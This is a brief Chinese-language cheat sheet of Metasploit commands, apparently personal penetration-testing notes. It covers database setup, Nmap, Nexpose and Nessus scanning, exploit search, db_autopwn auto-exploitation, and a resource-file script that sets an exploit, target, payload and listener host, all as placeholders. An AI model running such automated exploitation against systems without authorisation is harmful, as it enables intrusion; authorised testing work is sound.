1.连接数据并显示一些信息 db_connet username:password@ip address/database name db_destroy 同上 db_import 文件名字 db_hosts -c address,svcs,vulns // 显示ip地址,服务器,漏洞数 db_vlns // 显示漏洞名字 2.nmap扫描 db_nmap -sS -nP ip address db_nmap -h 3.nexpose在metasploit的使用 load nexpose // 加载nexpose插件 nexpose -h nexpose_connect 用户名:密码@ip地址:端口号 认证字符 nexpose_scan ip地址 db_hosts -c address // 显示漏洞信息 4.nessus在metasploit的使用 load nessus nessus_connect 用户名:密码@ip地址:端口号 认证字符 nessus_policy_list //显示策略列表 nessus_scan_new nessus_scan_new 2 bridge_scan ip地址 nessus_scan_status //显示状态 nessus_report_list // 报告列表 nessus_report_get 报告名字 // 显示报告 db_hosts -c address,svcs,vlns db_autopwn -e -t -r -x -p // 自动运行检测数据库中得到的漏洞 5.搜索漏洞 search mysql // 搜索mysql的漏洞 6.保存metasploit用过的命令到文件 makerc 路径/文件名字 自动审计,运行检测 7.脚本如下 echo use 漏洞名字 >autoexploit.rc echo set RHOST IP地址 >> autoexploit.rc echo set PAYLOAD shellcode名字 >> autoexploit.rc echo set LHOST IP地址 >> autoexploit.rc echo exploit >> autoexploit.rc